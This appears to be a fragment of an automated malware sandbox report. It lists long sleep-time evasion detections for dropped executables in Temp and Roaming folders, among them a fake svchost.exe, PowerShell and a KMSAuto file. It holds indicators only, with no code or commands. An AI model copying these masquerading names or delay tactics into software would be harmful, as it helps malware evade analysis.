                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -99171s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -99026s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -98843s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 8016Thread sleep time: -98640s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 5432Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\476D.tmp.Server.exe TID: 7196Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -37815825351104557s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -600000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -599672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -599532s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -599101s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -598875s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -598610s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -598328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -598026s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -597719s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -597453s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -597125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -596500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -596078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -595625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -595110s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -594360s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -593922s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -593500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -593047s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -592766s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -592438s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -591907s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -591610s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -591313s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -591105s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -590891s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -590575s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -590328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -589985s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -589413s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -589194s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -588911s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -588672s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -588489s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -588281s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -588047s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -587813s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -587625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -587391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -587172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -586953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -586719s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -586557s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -586359s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -586177s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -585984s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -585824s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -585625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -585391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -585172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -584946s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -584782s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -584531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -584297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -584032s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -583794s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -583594s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -583450s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -583188s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -582969s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -582735s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -582500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -582324s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -582125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -581844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -581625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -581297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -580961s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -580750s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -580578s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -580391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -580102s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -579910s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -579705s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -579500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -579250s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -579028s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -578688s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -578499s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -578203s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -577938s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -577656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -577344s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -577094s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -576844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -576563s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -576282s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -576057s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -575797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -575578s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -575352s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -575078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -574813s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -574532s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -574281s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -574047s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -573891s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -573700s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -573469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -573250s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -573016s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -572828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -572625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -572375s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -572125s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -571938s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -571709s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -571469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -571219s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -571016s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -570813s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -570594s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -570297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -569907s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -569625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -569422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -569227s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -569016s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -568779s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -568618s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -568406s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -568208s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -567719s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -567438s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -567226s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -567031s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -566857s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -566690s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -566496s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -566305s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -566031s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -565828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -565625s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -565391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -565183s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -564891s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -564688s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -564514s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -564297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -564078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -563844s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -563328s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -563123s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -562906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -562688s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -562391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -562195s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -561985s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -561735s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -561516s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -561297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -561078s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -560860s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -560656s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -560469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -560282s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -560032s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -559828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -559632s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -559419s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -559235s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -558907s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -558657s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -558469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -558266s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -558016s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -557837s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -557608s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -557391s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -557141s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -556907s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -556500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -556297s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -556094s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -555797s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -555563s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -555364s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -555172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -554974s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -554789s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -554610s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -554382s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -553953s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -553691s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -553422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -553199s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -552938s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -552735s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -552531s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -552282s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -551735s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -551485s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -551281s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -551063s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -550858s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -550703s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -550484s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -550172s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -549969s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -549610s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -549141s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -548906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -548703s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -548469s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -548266s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -547938s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -547735s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -547422s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -546906s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -546594s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -546266s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -545969s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -545500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -545188s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -544500s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -544198s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7496Thread sleep time: -543828s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7356Thread sleep time: -30000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\4BC4.tmp.Client.exe TID: 7264Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\5087.tmp.update.exe TID: 7436Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\53A5.tmp.update.exe TID: 7528Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\5E16.tmp.aaa.exe TID: 7644Thread sleep time: -55000s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe TID: 8084Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\62AB.tmp.build.exe TID: 7688Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 8068Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 8076Thread sleep count: 1947 > 30
                      Source: C:\Users\user\AppData\Roaming\svchost.exe TID: 8068Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6616Thread sleep count: 299 > 30
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5516Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6892Thread sleep time: -922337203685477s >= -30000s
                      Source: C:\ProgramData\KMSAuto\accc.exe TID: 6992Thread sleep time: -922337203685477s >= -30000s
